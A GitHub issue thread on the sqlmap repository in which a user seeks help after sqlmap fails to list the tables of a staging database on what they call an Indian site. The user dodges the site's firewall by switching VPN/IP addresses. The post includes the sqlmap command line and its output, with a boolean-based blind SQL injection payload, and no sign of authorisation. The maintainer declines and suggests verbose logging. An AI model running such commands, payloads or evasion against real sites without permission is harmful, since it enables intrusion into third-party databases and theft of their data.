### ISSUE TITLE
[ERROR] invalid character detected. retrying..

### ISSUE THREAD

**Issue by CostyCrypto** [sqlmapproject/sqlmap#5161]
i have try with this

sqlmap.py -r mat1.txt -D stage_db_** --tables --batch --hex --threads (1~10) from 1to10 (the test on an Indian site)
bypassing WAF method (by keeping switching VPN/IP)

[INFO] resuming back-end DBMS 'mysql'
[INFO] testing connection to the target URL
[CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Userdetails[ud_***] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Userdetails[ud_***]=1 AND 2636=2636
---
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[INFO] fetching tables for database: 'stage_db_**'
[INFO] fetching number of tables for database 'stage_db_**'
[INFO] retrieved:
[WARNING] reflective value(s) found and filtering out
[WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
[INFO] retrieved:
[WARNING] unable to retrieve the number of tables for database 'stage_db_**'
[INFO] fetching number of tables for database 'stage_db_**'
[ERROR] invalid character detected. retrying..
[INFO] retrieved:
[ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 10 times

**Comment by stamparm** [comment]
`[CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS` - sorry, but sqlmap's Issue board is not for resolving this kind of problems. you should rerun everything with `-v 5` or `-t traffic.txt` and try to see what's going on inside the requests/responses. then, you should try to manually assess the target
